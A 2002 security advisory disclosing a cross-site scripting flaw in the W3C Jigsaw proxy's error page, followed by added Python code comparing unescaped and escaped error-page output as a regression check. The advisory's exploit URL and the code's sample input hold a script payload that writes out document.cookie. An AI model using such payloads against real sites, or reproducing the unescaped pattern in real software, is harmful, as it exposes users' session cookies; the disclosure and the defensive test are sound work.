From: TAKAGI, Hiromitsu (takagi.hiromitsu_at_aist.go.jp)
Date: Sat Aug 17 2002 - 14:10:45 CDT

    W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability
    ===========================================================

    Affected:
      Jigsaw 2.2.0 and earlier
      http://www.w3.org/Jigsaw/RelNotes.html#2.2.0

    Fixed:
      Jigsaw 2.2.1
      http://www.w3.org/Jigsaw/RelNotes.html#2.2.1

    Exploit:
      http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>

      ========================================================
      An HTTP error occured while getting: <p>
      <strong>
    http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT></strong><p>
      Details "The host name [nonexistenthost.google.com] couldn't be resolved.
      Details: "nonexistenthost.google.com"".<hr>Generated by
      <i>
    http://.............:8001/
    ...snip...
      ========================================================
      
      Similar problems have been found in Proxomitron Naoko-4 BetaFour,
      Microsoft ISA Server and Squid 2.4 DEVEL4.
      <http://www.securityfocus.com/bid/3087>
      <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
      <http://www.securityfocus.com/archive/1/197606>

    Vendor Status:
      Aug 10, 2001: Notified
      Jan 4, 2002: Responded
      Apr 8, 2002: Fix released

    Best regards,

    --
    Hiromitsu Takagi
    http://staff.aist.go.jp/takagi.hiromitsu/
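
The error page quoted in the advisory copies the requested URL and host name into HTML without encoding. The following is an added example, not part of the original message and not Jigsaw's code: a simplified stand-in for a proxy error-page generator, shown unescaped and escaped, with a check suitable for a regression test. The function names and page wording are assumptions; the sample URL is the string as it appears in the advisory text.

```python
import html
from urllib.parse import urlsplit

# Sample input: the request URL exactly as printed in the advisory above.
SAMPLE_URL = "http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>"

HTML_METACHARS = "<>&\"'"


def error_page_unescaped(url: str, host: str) -> str:
    """Mirrors the reported behaviour: request data is copied into HTML as-is."""
    return (
        "An HTTP error occurred while getting: <p>\n"
        f"<strong>{url}</strong><p>\n"
        f"Details: the host name [{host}] couldn't be resolved.<hr>\n"
    )


def error_page_escaped(url: str, host: str) -> str:
    """Hardened form: every request-derived value is HTML-escaped before output."""
    safe_url = html.escape(url, quote=True)
    safe_host = html.escape(host, quote=True)
    return (
        "An HTTP error occurred while getting: <p>\n"
        f"<strong>{safe_url}</strong><p>\n"
        f"Details: the host name [{safe_host}] couldn't be resolved.<hr>\n"
    )


def reflects_raw(page: str, value: str) -> bool:
    """True if a value containing HTML metacharacters appears verbatim in the page."""
    has_meta = any(ch in value for ch in HTML_METACHARS)
    return has_meta and value in page


def check(url: str) -> dict:
    """Render both variants for one request URL and report which one reflects it raw."""
    host = urlsplit(url).hostname or ""
    return {
        "unescaped_reflects": reflects_raw(error_page_unescaped(url, host), url),
        "escaped_reflects": reflects_raw(error_page_escaped(url, host), url),
    }


if __name__ == "__main__":
    print(check(SAMPLE_URL))
    print(error_page_escaped(SAMPLE_URL, urlsplit(SAMPLE_URL).hostname or ""))
```

The same check can be pointed at any generated error or status page: feed it a request value containing markup characters and fail the build if the value comes back byte-for-byte in the HTML.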